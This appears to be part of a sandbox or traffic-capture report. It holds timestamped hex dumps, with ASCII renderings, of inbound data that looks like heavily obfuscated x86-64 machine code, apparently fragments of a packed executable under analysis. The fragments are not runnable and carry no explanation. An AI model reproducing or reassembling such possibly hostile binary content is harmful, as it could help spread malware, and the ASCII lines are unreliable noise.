                                                                                                                2022-10-13 11:07:30 UTC2895INData Raw: f7 d9 41 3a cc f9 41 81 e9 87 7d 08 62 45 3a d9 41 50 44 31 0c 24 41 fe c0 41 c0 d8 a2 4c 0b c3 41 58 41 f6 c0 b7 f8 4d 63 c9 f5 49 03 d9 e9 e9 b0 ff ff 41 f7 d0 e9 a1 76 00 00 ff c6 f9 40 f6 c4 3b f7 de f8 81 ee 7c 2b d7 69 e9 69 d3 00 00 e9 d5 ab fd ff 48 8b 54 25 00 66 41 2b df fe cb 66 c1 eb b6 48 8b 5d 08 48 81 ff 19 43 bd 48 48 f7 d2 3b fb 48 f7 d3 f5 f9 66 41 f7 c0 92 4d 48 23 d3 0f bf df 41 0f b7 db 48 89 55 08 0f cb 48 0f bf da f6 d3 9c 41 32 d8 66 85 d1 8f 44 25 00 41 8b 1b e9 a9 82 07 00 66 0f b6 44 25 00 48 0f ba fa 4d 3c b6 8a 5d 02 48 81 ed 06 00 00 00 f6 d0 48 81 ea e1 0e 76 3e 41 80 fa 50 f6 d3 48 0f ba fa d4 c1 f2 1c d2 fe 22 c3 41 0f b7 d1 66 40 0f b6 d4 66 89 45 08 0f ca 66 f7 d2 41 0f bf d1 9c f5 0f a4 f2 6d 66 d3 e2 8f 44 25 00 d2 c6
                                                                                                                Data Ascii: A:A}bE:APD1$AALAXAMcIAv@;|+iiHT%fA+fH]HCHH;HfAMH#AHUHA2fD%AfD%HM<]HHv>APH"Af@fEfAmfD%
                                                                                                                2022-10-13 11:07:30 UTC2911INData Raw: ee 04 00 00 00 d2 ea 8b 16 41 33 d3 f9 c1 c2 02 f9 f8 81 c2 8d 59 2f 33 f7 d2 e9 dc dd 01 00 ff ce f8 f9 f7 de e9 d6 cd f9 ff c1 c0 02 2d 72 43 6b 20 f7 d0 48 81 fc d7 0b aa 72 f5 f9 53 f9 0f bd de 48 13 dc 31 04 24 e9 99 59 08 00 41 33 d1 f7 d2 f8 c1 c2 02 0f ca 4c 3b f5 f9 f5 f7 da 66 f7 c3 8c 10 45 3b da 81 f2 40 45 fa 3a d1 c2 41 80 fc b2 41 51 49 ff c9 31 14 24 41 59 44 84 c9 49 3b ff 48 63 d2 40 3a ce f9 48 03 ea e9 03 8b 03 00 80 fb 04 f7 d2 f5 f8 53 0f bf dd 66 0f be dc 31 14 24 87 db 66 f7 c4 01 04 66 81 d3 d4 4d 5b f8 41 80 fe 02 48 63 d2 f8 45 3a f3 48 03 ea 55 c3 ff c2 f9 41 50 45 0f bb c0 31 14 24 4c 8b c4 4d 0f b7 c2 41 58 3d c2 57 fc 4d f9 48 63 d2 4c 03 d2 e9 55 06 02 00 41 0f c9 e9 44 a9 f9 ff d1 cf 55 40 86 ed 41 1a ec 66 40 0f be ec 31
                                                                                                                Data Ascii: A3Y/3-rCk HrSH1$YA3L;fE;@E:AAQI1$AYDI;Hc@:HSf1$ffM[AHcE:HUAPE1$LMAX=WMHcLUADU@Af@1
                                                                                                                2022-10-13 11:07:30 UTC2927INData Raw: 66 3b ef 66 44 85 d5 41 33 d0 f9 e9 2e a2 04 00 53 c3 ff c1 41 3a fb 41 80 ff e2 41 f7 c7 bc 14 fb 64 57 40 80 d7 e7 40 d2 cf 48 0f bf fc 31 0c 24 49 8b f8 40 d2 ef f7 d7 5f 66 81 f9 b6 1e 48 63 c9 4c 03 c9 e9 2c 0f fb ff 41 d1 c2 f5 41 3a c4 41 f7 da f9 45 84 e5 41 0f ca 40 84 e6 41 81 c2 6e 6e 30 4f f9 41 f7 da f8 f5 56 40 80 ee 19 40 d2 ee 44 31 14 24 5e 66 41 f7 c6 a2 61 e9 f2 21 fa ff 41 81 f2 d4 02 a2 63 f5 41 d1 ca 41 81 f2 94 39 64 14 41 f6 c3 a8 f5 e9 9f b3 ff ff 4c 0f bf f9 41 0f 93 c6 5d 41 58 41 0f cf 98 48 0f bf fc 5f 9f 41 5f 4d 0f b7 f1 0f b7 f5 4c 0f bf f1 58 66 44 0f be f7 41 0f ce 66 41 be 12 68 5e 41 5e e9 df 47 08 00 f7 d6 ff ce f9 f5 d1 ce 57 31 34 24 40 80 ef fa 48 c1 c7 86 0f ba ff 64 5f 48 63 f6 4c 03 ce e9 48 7d 08 00 ff cb f8 45
                                                                                                                Data Ascii: f;fDA3.SA:AAdW@@H1$I@_fHcL,AA:AEA@Ann0OAV@@D1$^fAa!AcAA9dALA]AXAH_A_MLXfDAfAh^A^GW14$@Hd_HcLH}E
                                                                                                                2022-10-13 11:07:30 UTC2943INData Raw: c1 dd f9 0f ba fd 75 8b 2b f9 f5 48 81 c3 04 00 00 00 a9 0b 67 0d 0a 66 81 fd dc 21 41 33 eb 41 81 fb 4f 06 db 3c f6 c4 af 81 f5 04 77 22 70 ff c5 0f cd 41 f6 c6 ae f8 f5 81 c5 71 3f b3 54 45 84 c3 f5 e9 f3 ca 02 00 66 81 ff 7e 63 41 33 f3 f9 f5 d1 c6 ff c6 f9 e9 ef 11 01 00 9c 66 41 81 fa 5c 7c 66 81 e9 f0 09 41 8f 03 49 81 ea 04 00 00 00 f8 41 8b 0a 41 f7 c1 2e 44 35 11 33 cd ff c1 f7 d9 e9 c1 b7 03 00 48 03 d8 e9 f9 c2 f7 ff e9 52 72 07 00 f8 66 f7 c7 d8 10 48 63 d2 f5 48 03 f2 e9 1d 82 ff ff 66 8b 44 25 00 66 0f a3 c2 66 d3 da 66 8b 55 02 48 81 ed 06 00 00 00 4c 3b d5 66 03 c2 66 89 45 08 9c 66 98 c1 c0 5b 66 41 33 c5 8f 44 25 00 41 8b 03 41 3a c2 40 f6 c5 d5 49 81 c3 04 00 00 00 33 c6 40 f6 c5 a6 40 3a f6 80 fe 4b f7 d8 0f c8 66 f7 c3 fc 59 f9 45 3a
                                                                                                                Data Ascii: u+Hgf!A3AO<w"pAq?TEf~cA3fA\|fAIAA.D53HRrfHcHfD%fffUHL;ffEf[fA3D%AA:@I3@@:KfYE:
                                                                                                                2022-10-13 11:07:30 UTC2959INData Raw: bf db c6 c7 a7 31 14 24 44 0f a4 d3 7f 5b 48 63 d2 80 f9 c5 48 03 f2 e9 56 16 f5 ff e9 49 ed 01 00 e9 08 40 f6 ff 41 ff c2 e9 04 50 fc ff 0f 84 38 9c fb ff 48 8d 05 5a 7f f5 ff 41 0f b6 32 f9 41 f6 c7 bf 33 f5 45 3a ce 41 f7 c6 bd 06 d4 00 81 e6 ff 00 00 00 8b 34 b0 f5 41 3b cb c1 ed 08 33 ee e9 0b 3d f6 ff ff ca f9 f5 c1 c2 02 41 84 c3 81 ea 6e 05 5e 0f f5 e9 4e 9d ff ff 41 ff ca 66 41 85 cd 41 51 44 12 cb 4c 63 ce 44 31 14 24 66 41 81 e9 07 0f 66 41 81 d1 26 5c 41 d3 c1 41 59 40 84 de f5 f8 4d 63 d2 f8 80 fd 56 49 03 ea e9 dc ff f6 ff e9 8b 34 fd ff 53 c3 41 81 eb e4 6a 7f 44 f9 40 f6 c6 be 41 50 44 31 1c 24 66 45 0f ab f8 4d 63 c5 41 80 d0 d6 41 58 f5 f6 c6 fe 4d 63 db 4d 03 d3 e9 ee 08 08 00 48 8b 03 36 8b 30 41 c0 d8 0c 4d 0f bc c3 41 3a df 48 81 c3
                                                                                                                Data Ascii: 1$D[HcHVI@AP8HZA2A3E:A4A;3=An^NAfAAQDLcD1$fAfA&\AAY@McVI4SAjD@APD1$fEMcAAXMcMH60AMA:H
                                                                                                                2022-10-13 11:07:30 UTC2975INData Raw: 13 53 49 63 df 41 0a db 66 c1 e3 f6 31 0c 24 66 0f b6 dd c1 d3 ea e9 a1 dd fe ff e9 18 d8 fb ff e9 45 ad 01 00 55 c3 41 f6 c5 bc 66 41 d3 e9 48 f7 d1 66 44 89 4d 08 49 8b c8 9c b9 7a 5d ee 7a 66 0f ba f1 63 8f 44 25 00 d2 ed 66 33 cb 41 8b 0b 49 81 c3 04 00 00 00 e9 44 cd 00 00 48 8b 0e 66 0f bc ff 36 66 0f b6 19 66 0f be fb 40 d2 cf f9 48 81 c6 06 00 00 00 0f bc fb 49 0f b7 f9 40 fe cf 66 89 1e 0f ba e7 d8 44 3a c6 81 df 62 5e 47 01 49 81 e8 04 00 00 00 48 0f b7 fd 66 41 f7 c5 80 71 0f 47 fb 41 8b 38 f5 f9 41 33 f9 ff cf f9 c1 c7 03 e9 51 ff f6 ff 44 85 cd 4c 23 d8 48 8b d7 4c 89 5e 08 e9 f9 c3 06 00 48 81 ee 08 00 00 00 66 0f 44 ff f7 df 41 81 d2 9d 70 24 6f 4c 8b 16 66 41 1b f9 4d 33 d3 48 0f bf fe 87 ff 49 0f ca 48 ff c7 40 86 ff 48 0f b7 f8 49 ff c2
                                                                                                                Data Ascii: SIcAf1$fEUAfAHfDMIz]zfcD%f3AIDHf6ff@HI@fD:b^GIHfAqGA8A3QDL#HL^HfDAp$oLfAM3HIH@HI
                                                                                                                2022-10-13 11:07:30 UTC2991INData Raw: 8f 03 49 0f bf c9 49 81 ea 04 00 00 00 66 0f bb f1 41 8b 0a 33 cd e9 92 67 f6 ff 41 ff ca 41 d1 ca 49 3b e5 f9 41 0f ca 41 f7 da f5 41 51 41 0f ba f1 db 44 2b ce 44 31 14 24 4d 0f bf cb 4d 63 cf 66 41 0f ba e1 06 41 59 e9 ad 39 04 00 49 8b 11 66 d3 f1 66 44 8b 12 80 c5 ec c0 f1 40 49 81 c1 06 00 00 00 66 45 89 11 8b 0f 80 fe e3 e9 b4 de fe ff 4c 8b 54 25 00 48 8b 4d 08 41 0b d9 d2 db 49 0f b7 df 4c 03 d1 66 41 0f b6 dc e9 66 57 fb ff f8 33 c7 ff c0 f9 35 01 4d 62 07 f9 f5 2d e8 71 52 2e f5 d1 c0 f5 0f c8 57 f5 f9 49 0f bf ff 31 04 24 48 c1 ff 51 48 0f ba e7 79 5f 48 63 c0 f8 e9 b6 50 f4 ff f9 41 81 eb bc 50 33 2a 41 3a c7 e9 43 7b 05 00 e9 8e 6c 01 00 e9 2b f3 03 00 8b 6c 25 00 45 85 c7 d3 ef 66 81 f7 3d 71 8b 3b 48 81 c3 04 00 00 00 41 85 f1 41 33 f8 ff
                                                                                                                Data Ascii: IIfA3gAAI;AAAQAD+D1$MMcfAAY9IffD@IfELT%HMAILfAfW35Mb-qR.WI1$HQHy_HcPAP3*A:C{l+l%Ef=q;HAA3
                                                                                                                2022-10-13 11:07:30 UTC3007INData Raw: 48 c1 e8 b2 49 81 e8 04 00 00 00 66 0f b6 c2 41 8b 00 e9 54 2a fe ff 66 41 0f 45 e9 44 33 c3 49 0f b7 ed 41 f7 d8 48 ff cd 66 40 0f b6 ed 41 0f c8 66 0f b6 eb 41 ff c8 41 c1 c8 03 0f b7 eb 41 0f c8 40 fe cd 41 ff c8 bd e1 01 2a 25 4d 3b dc 53 44 31 04 24 66 41 13 ea f8 44 3a d4 5b f6 c6 1c c1 cd a1 49 81 e9 04 00 00 00 66 c1 f5 c9 66 44 0f bb e5 66 23 ee 45 89 01 48 0f ab c5 0f c1 ed 8b 2f f5 48 81 c7 04 00 00 00 e9 b2 9f fd ff e9 f0 07 f9 ff 53 66 0f b6 da 31 2c 24 f8 66 40 0f be dd 5b 48 63 ed e9 a3 2b 05 00 ff c1 f8 c1 c1 03 f8 f9 f7 d1 f8 c1 c9 02 e9 18 a0 f8 ff 44 8b 44 25 00 e9 1d ad f8 ff e9 77 74 fc ff ff c2 66 41 f7 c5 dd 4a 44 84 ed 41 50 45 0f 45 c0 31 14 24 41 58 f5 41 3b d6 48 63 d2 f9 e9 b9 41 fb ff 45 3a d5 81 f2 85 1a df 75 e9 78 63 f8 ff
                                                                                                                Data Ascii: HIfAT*fAED3IAHf@AfAAA@A*%M;SD1$fAD:[IffDf#EH/HSf1,$f@[Hc+DD%wtfAJDAPEE1$AXA;HcAE:uxc
                                                                                                                2022-10-13 11:07:30 UTC3023INData Raw: 00 36 41 88 0a 66 44 0f ab c1 66 c1 c9 a8 41 8b 0b f8 44 84 f2 49 81 c3 04 00 00 00 66 44 3b d1 e9 7d 96 ff ff e9 40 ed 00 00 48 81 c3 04 00 00 00 41 33 f3 66 41 3b f1 f7 de e9 a6 65 05 00 66 8b 3e c0 ef 03 f6 d3 66 8b 5e 02 48 81 ee 06 00 00 00 48 85 f4 f5 66 f7 d7 66 f7 d3 f5 f8 f9 66 0b fb e9 e0 46 f5 ff 35 7c 30 da 7e e9 38 35 07 00 41 ff c2 e9 12 88 f9 ff 8b 0e 44 8b 5e 04 49 c1 c2 a3 48 81 ee 04 00 00 00 66 45 03 d1 41 c0 e2 c0 f7 d1 45 32 d5 41 f7 d3 66 41 81 ea 69 37 41 ba 0e 63 18 79 41 23 cb 66 45 0f 4b d5 89 4e 08 44 0f bf d7 41 0f 92 c2 66 44 0f b6 d5 9c 49 ff ca 8f 06 4c 0f bf d4 41 c0 f2 47 49 81 e8 04 00 00 00 45 0f c1 d2 4d 13 d4 44 8b d7 45 8b 10 41 80 ff 57 e9 4d db 02 00 e9 57 34 fc ff ff e6 d1 ce f9 e9 1e 24 fc ff c1 c0 02 56 31 04 24
                                                                                                                Data Ascii: 6AfDfADIfD;}@HA3fA;ef>f^HHfffF5|0~85AD^IHfEAE2AfAi7AcyA#fEKNDAfDILAGIEMDEAWMW4$V1$
                                                                                                                2022-10-13 11:07:30 UTC3039INData Raw: c3 44 31 14 24 41 d3 f3 41 c0 f3 33 f8 41 5b 66 41 85 f9 f5 4d 63 d2 45 3a e4 66 f7 c4 4e 23 49 03 da e9 d2 90 fd ff ff 74 dd 20 81 eb 01 00 00 00 e9 b6 2f 04 00 48 8b 74 25 00 86 c9 8a 4d 08 45 3a e5 45 84 d2 e9 73 a9 ff ff 48 8b 44 25 00 66 41 3b d4 66 41 f7 d1 49 f7 c0 0c 1a 5c 1e 48 81 c5 08 00 00 00 4d 0f b7 ca 66 41 81 f1 ef 71 66 41 23 d2 44 0f b6 0b ff c2 48 81 c3 01 00 00 00 48 99 45 32 c8 d2 e2 41 80 c1 4e 41 f6 d9 66 0f b6 d6 48 63 d1 e9 1f 70 f8 ff 66 41 0f b6 30 f5 41 8a 48 02 45 84 cb f9 49 81 e8 06 00 00 00 41 f6 c4 06 f5 40 d2 e6 66 41 89 70 08 49 63 f4 41 0f bf f7 9c 41 8f 00 66 ff ce d3 ee 8b 33 48 81 c3 04 00 00 00 f5 41 33 f3 f9 44 3a e0 f7 d6 e9 f5 18 05 00 41 84 cc 45 33 d8 41 80 fa 58 f5 41 f7 db e9 72 7e 00 00 41 d1 cb 41 81 c3 da
                                                                                                                Data Ascii: D1$AA3A[fAMcE:fN#It /Ht%ME:EsHD%fA;fAI\HMfAqfA#DHHE2ANAfHcpfA0AHEIA@fApIcAAf3HA3D:AE3AXAr~AA
                                                                                                                2022-10-13 11:07:30 UTC3055INData Raw: fb 03 00 66 41 8b 10 41 c0 c2 54 49 d3 ea 49 81 c0 02 00 00 00 49 0f ac f2 93 66 45 0f ab fa 44 0f b6 13 66 f7 c2 ce 60 48 81 c3 01 00 00 00 f8 f5 40 80 fe da 45 32 d3 41 80 c2 8a 44 3a ca 41 80 f2 f5 e9 b0 c6 f8 ff 48 8b 7c 25 00 c0 d1 ee 40 12 cf d2 e9 4c 8b 4d 08 80 e1 90 8a 4d 10 40 f6 c4 1e 48 81 c5 02 00 00 00 41 f6 c1 83 4c 0f ad cf e9 f1 f6 fd ff 49 89 41 10 9f 9c 49 63 c7 41 8f 01 66 15 3a 7a e9 c9 e9 f9 ff 66 41 8b 11 66 45 8b 59 02 40 d2 df 66 44 0f a3 ef 49 81 e9 06 00 00 00 40 d2 cf 0f ba f7 b4 66 41 03 d3 66 41 89 51 08 49 0f b7 fe 48 0f bf f8 40 f6 d7 9c 41 8f 01 41 0f bf fb 66 41 0b fd 49 81 e8 04 00 00 00 66 41 0f bd fa 41 8b 38 80 fa 5a 33 fb f7 df 44 3b c5 81 f7 cc 3d d9 7a f5 40 3a e3 81 c7 a4 5a 17 40 c1 c7 02 e9 9b 8b 01 00 41 f7 d0
                                                                                                                Data Ascii: fAATIIIfEDf`H@E2AD:AH|%@LMM@HALIAIcAf:zfAfEY@fDI@fAfAQIH@AAfAIfAA8Z3D;=z@:Z@A
                                                                                                                2022-10-13 11:07:30 UTC3071INData Raw: 4d 33 da 66 41 23 f9 48 81 ed 08 00 00 00 0f a3 d7 66 44 0f ab c7 49 0f bc fa 4c 89 54 25 00 48 81 ee 04 00 00 00 8b 3e f9 41 33 fb 81 f7 cf 65 73 4e ff cf e9 ae a1 05 00 57 44 31 14 24 40 c0 c7 6c d3 f7 66 87 ff 5f f9 4d 63 d2 45 84 d1 4d 03 ca e9 ba f5 f8 ff 49 81 ea 04 00 00 00 49 81 d3 9a 37 6b 4a 45 8b 1a 45 33 d8 41 d1 c3 f9 41 f7 d3 41 c1 cb 02 66 41 81 fc 78 7d 41 f7 db 44 84 d9 41 3b c0 41 80 fc a5 41 50 f9 44 31 1c 24 41 d2 e0 4d 0f b7 c3 45 22 c5 41 58 41 f6 c7 91 e9 dd 5b ff ff 41 ff e1 48 8b 2e 66 44 0f a3 ff 26 66 8b 7c 25 00 66 f7 d5 66 c1 f5 42 48 81 c6 06 00 00 00 49 63 eb 40 d2 ed 66 89 3e 40 0f c0 ed f8 49 81 ea 04 00 00 00 41 8b 2a f8 45 84 e8 41 33 e8 40 f6 c4 36 f7 d5 41 f6 c5 36 81 ed 21 1c f2 0e d1 c5 e9 51 ee 03 00 66 44 89 5b 08
                                                                                                                Data Ascii: M3fA#HfDILT%H>A3esNWD1$@lf_McEMII7kJEE3AAAfAx}ADA;AAPD1$AME"AXA[AH.fD&f|%ffBHIc@f>@IA*EA3@6A6!QfD[
                                                                                                                2022-10-13 11:07:30 UTC3087INData Raw: 81 eb 16 4b 98 3b 41 d1 c3 f5 53 44 31 1c 24 d2 d3 5b f9 e9 79 42 05 00 e9 7b 2d 04 00 33 cb c1 c9 03 81 fd fc 62 ed 0a f8 e9 72 07 01 00 41 f7 d2 e9 d9 fe fc ff f7 d8 c1 c0 03 66 41 f7 c4 d9 4b 44 3a fd 56 40 f6 de 31 04 24 f8 c1 ce f5 40 c0 e6 53 5e f5 48 63 c0 4c 03 c0 e9 94 b7 fa ff 41 33 f0 e9 8b 01 02 00 f8 41 f7 d3 e9 56 58 fe ff 33 cd 0f c9 f5 f9 c1 c1 02 e9 4f 2e 02 00 f9 66 41 85 d9 41 53 31 0c 24 44 03 df 45 22 df 41 5b 66 45 3b d3 41 f6 c7 6b 48 63 c9 f9 80 fa 37 66 44 3b ed 48 03 d9 e9 32 ff 00 00 41 33 f8 ff c7 f7 d7 f9 0f cf 44 3a d0 81 ef 93 40 df 13 66 3d 3b 7e 41 50 31 3c 24 41 58 48 3b ef 48 63 ff f8 e9 d2 d3 ff ff 00 00 00 00 00 00 00 d4 2d 9d 0f f7 de 41 50 66 41 c1 e0 9f 31 34 24 41 0f 94 c0 66 45 13 c0 66 44 0f 45 c7 41 58 e9 af bf
                                                                                                                Data Ascii: K;ASD1$[yB{-3brAfAKD:V@1$@S^HcLA3AVX3O.fAAS1$DE"A[fE;AkHc7fD;H2A3D:@f=;~AP1<$AXH;Hc-APfA14$AfEfDEAX
                                                                                                                2022-10-13 11:07:30 UTC3103INData Raw: 44 25 00 66 3b ee 48 81 ec 20 00 00 00 ff d0 48 8b 64 25 f0 e9 98 5f f3 ff 41 52 c3 41 5b e9 54 29 fb ff 44 3a fd 33 fb c1 cf 03 e9 1b 05 f8 ff 53 c1 cb a6 66 0f ba fb a0 44 31 14 24 5b f6 c7 d0 4d 63 d2 45 85 f6 49 03 f2 e9 54 26 f3 ff ff cf e9 97 e3 fa ff 66 41 81 ff 95 31 f5 48 03 ef e9 b4 9d f9 ff 0f 86 12 00 00 00 ba 04 00 00 00 48 81 e8 1e 30 90 0c c0 e0 e9 8d 4b fc c1 e1 03 66 44 0f ac c0 24 d2 fc c1 e2 03 66 1d be 47 48 8b c5 81 fb 58 75 bc 0a 41 f6 c4 e0 f9 48 03 c2 44 84 fc 45 3a f3 48 89 44 25 f8 f5 48 89 64 25 f0 48 f7 c3 b2 49 66 17 f9 66 81 fb da 7f 48 2b e1 41 3b e6 f8 48 81 e4 f0 ff ff ff 48 8d 24 0c f5 85 db e9 d9 af 03 00 c1 c1 02 41 f6 c6 1e f8 55 66 0f a4 dd 56 48 0f bf ea 31 0c 24 48 0f ba e5 ea 0f ab cd 5d 66 45 3b d5 81 fd 12 65 b7
                                                                                                                Data Ascii: D%f;H Hd%_ARA[T)D:3SfD1$[McEIT&fA1HH0KfD$fGHXuAHDE:HD%Hd%HIffH+A;HH$AUfVH1$H]fE;e
                                                                                                                2022-10-13 11:07:31 UTC3119INData Raw: d2 40 3a ee 48 03 ea e9 15 bb f9 ff 5a 58 e9 de bc f5 ff 66 41 0f b6 28 41 c0 d9 39 45 8a 48 02 48 0f bd f5 40 80 c6 56 0f a3 de 49 81 e8 06 00 00 00 40 32 f0 66 d3 fe 40 f6 d5 41 f6 d1 66 d3 ce 66 f7 d6 44 0f b3 d6 41 22 e9 40 f6 d6 40 0f 95 c6 66 41 89 68 08 9c 66 be a4 7d 0f bf f0 41 8f 00 40 80 d6 61 66 0b f2 66 41 0f be f2 8b 33 66 44 3b c6 48 81 c3 04 00 00 00 41 33 f3 f9 48 81 fd a2 10 7a 4c f7 d6 e9 84 1a f4 ff ff cf e9 27 19 f8 ff 48 8b c5 f8 f9 48 81 ed 04 00 00 00 44 84 e3 89 44 25 00 fe c0 c0 f4 66 66 0f ba f8 13 41 8b 03 f8 49 81 c3 04 00 00 00 41 f6 c1 d9 41 80 fb 87 f5 33 c6 f5 05 88 57 d2 46 f8 c1 c8 03 f7 d0 e9 79 89 05 00 81 fb 02 00 00 00 e9 60 76 f7 ff e9 24 f3 01 00 66 44 0f b6 4c 25 00 8a 4d 02 d3 df 40 80 cf 91 40 86 ff 48 81 ed 06
                                                                                                                Data Ascii: @:HZXfA(A9EHH@VI@2f@AffDA"@@fAhf}A@affA3fD;HA3HzL'HHDD%ffAIAA3WFy`v$fDL%M@@H
                                                                                                                2022-10-13 11:07:31 UTC3135INData Raw: 02 48 81 ed 06 00 00 00 48 0f b7 ca d2 dd 49 33 ca 40 f6 d7 f9 48 81 e1 35 18 27 79 41 f6 d1 41 22 f9 48 63 c8 48 0f bf cc 41 0f b7 c8 66 89 7d 08 66 41 0f be ce 48 0f c9 41 0f bf c9 9c 66 ff c9 0f c1 c9 8f 44 25 00 8b 0b 66 a9 d2 73 48 81 c3 04 00 00 00 e9 2f 47 f2 ff f7 d6 81 f6 89 66 81 20 41 f7 c4 b2 01 fa 2c f8 0f ce 44 84 e1 53 66 0f ba e3 a2 32 de 48 d3 fb 31 34 24 5b 48 85 d0 f9 e9 e8 0e f9 ff ff c0 f9 c1 c0 03 f8 f9 45 84 fd 41 53 41 c0 e3 52 41 80 e3 f3 31 04 24 4d 0f bf d9 66 44 0f be dd 4d 0f b3 d3 41 5b 45 3b e4 f8 41 80 f8 80 48 63 c0 48 03 f8 e9 14 a5 02 00 48 8b 74 25 00 48 8b 45 08 c0 fa 82 8a 4d 10 48 d3 d2 48 81 c5 02 00 00 00 66 d3 da 66 44 0f bb fa 66 0f b6 d6 48 0f ad c6 48 0f b7 d0 66 41 0f 4b d3 48 89 75 08 9c 8f 44 25 00 0f 9e c2
                                                                                                                Data Ascii: HHI3@H5'yAA"HcHAf}fAHAfD%fsH/Gf A,DSf2H14$[HEASARA1$MfDMA[E;AHcHHt%HEMHHffDfHHfAKHuD%
                                                                                                                2022-10-13 11:07:31 UTC3151INData Raw: 24 41 59 f5 66 81 fe ae 6d 4d 63 d2 41 81 fb ba 0c e3 2a 44 84 e3 f8 49 03 ea e9 4d 44 02 00 66 85 ea 66 f7 d5 f9 66 f7 d0 66 23 e8 e9 3d 5f 01 00 4d 63 db f6 c2 0e 4d 03 d3 e9 09 42 fe ff 81 fb 03 00 00 00 e9 7d 39 fe ff f9 41 c1 ca 03 e9 6c ce 04 00 0f ce 44 3a c6 53 41 8a d9 b3 b4 31 34 24 5b e9 43 63 f7 ff 41 f7 d3 e9 8f fa fc ff ff c2 44 3a d7 81 f2 f9 55 01 25 f5 66 45 85 f3 f8 53 31 14 24 66 40 0f b6 dd 5b e9 3e e3 f7 ff 81 e6 ff 00 00 00 e9 20 68 fa ff 41 ff 31 4c 23 c4 41 c0 c0 bb 4d 0f b7 c4 49 81 c1 08 00 00 00 49 0f c8 4d 0f b3 f0 41 d2 c8 9d 44 0a c6 44 8b 07 66 81 fd 72 05 66 44 3b c1 48 81 c7 04 00 00 00 44 33 c3 41 81 f0 7e 22 74 5f 66 45 3b f2 41 f7 d8 45 84 e6 f8 66 45 3b e2 41 f7 d0 66 3b c1 f9 40 84 d6 41 f7 d8 41 ff c0 e9 ec 28 f3 ff
                                                                                                                Data Ascii: $AYfmMcA*DIMDffff#=_McMB}9AlD:SA14$[CcAD:U%fES1$f@[> hA1L#AMIIMADDfrfD;HD3A~"t_fE;AEfE;Af;@AA(
                                                                                                                2022-10-13 11:07:31 UTC3167INData Raw: ab c1 66 44 0f be c9 41 59 80 fe 26 48 63 d2 48 03 ea e9 2d 3f fe ff 41 50 c3 8b 7c 25 00 48 0f ba e0 60 8a 4d 04 66 0f a3 d0 15 88 3c 8b 62 48 81 ed 06 00 00 00 e9 89 1a f2 ff 41 50 41 c0 c8 2d 49 d3 c8 66 41 0f c8 44 31 1c 24 66 3b c3 66 45 0f c1 c0 66 41 0f c8 41 58 f8 41 3a f0 40 84 df 4d 63 db 66 85 f0 49 03 db 53 c3 e9 bd ff f2 ff ff c0 35 55 29 23 7c 55 31 04 24 40 0f 9f c5 5d 48 3b d6 48 85 e3 48 63 c0 45 3a de e9 82 ab f7 ff 4c 8b 44 25 00 66 c1 da fa d2 c2 99 36 49 8b 10 48 89 54 25 00 48 81 ee 04 00 00 00 66 44 0f be c5 44 8b 06 e9 4e 1a 04 00 4c 03 c0 e9 e4 d1 f7 ff d1 ce 66 f7 c3 2d 5a 81 f6 0a 71 62 46 f5 e9 e7 c2 fe ff f8 66 d3 e8 e9 f6 26 01 00 0f 85 06 09 05 00 5e f5 f7 d0 41 89 03 41 1a c1 48 0f c8 66 d3 d8 49 81 ea 04 00 00 00 41 8b 02
                                                                                                                Data Ascii: fDAY&HcH-?AP|%H`Mf<bHAPA-IfAD1$f;fEfAAXA:@McfIS5U)#|U1$@]H;HHcE:LD%f6IHT%HfDDNLf-ZqbFf&^AAHfIA
                                                                                                                2022-10-13 11:07:31 UTC3183INData Raw: 59 08 49 81 c1 10 00 00 00 66 85 ee 36 4d 89 18 8b 0f f6 c6 13 41 80 fd 41 48 81 c7 04 00 00 00 33 cb e9 96 bc f9 ff 4c 8b 13 45 85 fc 4c 0f bf cd 41 c0 c9 cf 48 81 c3 08 00 00 00 66 41 0f ab c1 66 41 d3 f9 66 85 dc 4d 33 d3 49 ff c2 f9 49 0f c9 49 f7 d2 66 45 0f ab d9 66 41 d3 d1 41 d2 c1 49 d1 ca 49 ff ca 4d 33 da 49 81 e8 08 00 00 00 66 45 0f be cd 4d 13 ce 4d 89 10 41 0f ab e9 44 8b 0b f8 48 81 c3 04 00 00 00 45 33 cb e9 af f9 03 00 66 45 3b e6 66 0b d1 66 0f 45 cb 66 41 89 51 08 0f c9 66 0f be cf 9c 0f 92 c5 44 0f ac d9 04 48 81 d9 c9 62 63 55 41 8f 01 49 81 e8 04 00 00 00 45 3b f2 80 d9 8a 41 32 cb 41 8b 08 33 cb f5 d1 c1 40 80 fc 92 45 3a e6 48 f7 c4 a8 41 d6 40 81 c1 bd 56 8e 68 f5 f7 d1 c1 c9 02 66 41 85 ec 53 d2 d3 d2 c3 66 41 0f be df 31 0c 24
                                                                                                                Data Ascii: YIf6MAAH3LELAHfAfAfM3IIIfEfAAIIM3IfEMMADHE3fE;ffEfAQfDHbcUAIE;A2A3@E:HA@VhfASfA1$
                                                                                                                2022-10-13 11:07:31 UTC3199INData Raw: 00 66 41 f7 c6 38 5a 45 12 cf 4c 3b e6 44 8b 0e f5 f9 45 33 cb 41 81 f1 37 57 1c 3d 41 0f c9 f8 49 81 fa 93 73 6f 54 41 f7 d1 41 81 e9 1b 00 5b 73 f8 f6 c5 67 41 f7 d9 e9 15 e7 f4 ff 66 89 45 08 9c 98 8f 44 25 00 41 8b 03 e9 62 97 f1 ff 41 81 f1 48 49 b0 5d 66 45 85 dc 41 81 c1 7d 24 1f 56 f8 48 81 f8 6d 10 86 1e f5 55 0f cd 49 63 ed 44 31 0c 24 48 81 f5 c5 6a e2 40 41 1a eb 0f c1 ed 5d 66 41 85 dc f5 4d 63 c9 f5 66 41 f7 c2 d2 7c 49 03 f1 e9 6f 22 fe ff 0f b6 07 41 c0 e8 4f 66 45 23 c1 66 41 c1 d8 36 48 81 c7 01 00 00 00 45 12 c5 32 c3 66 41 0f ab c0 d0 c0 fe c8 41 f6 d8 34 b9 d0 c8 66 44 0f 4b c0 fe c8 f6 d0 66 45 0f ac d8 8f 41 c0 d8 27 32 d8 66 44 8b 04 04 86 c0 49 81 e9 02 00 00 00 66 45 89 01 9f 8b 07 e9 27 d6 f2 ff 48 8b 33 66 41 0f 49 cc 36 66 8b
                                                                                                                Data Ascii: fA8ZEL;DE3A7W=AIsoTAA[sgAfED%AbAHI]fEA}$VHmUIcD1$Hj@A]fAMcfA|Io"AOfE#fA6HE2fAA4fDKfEA'2fDIfE'H3fAI6f
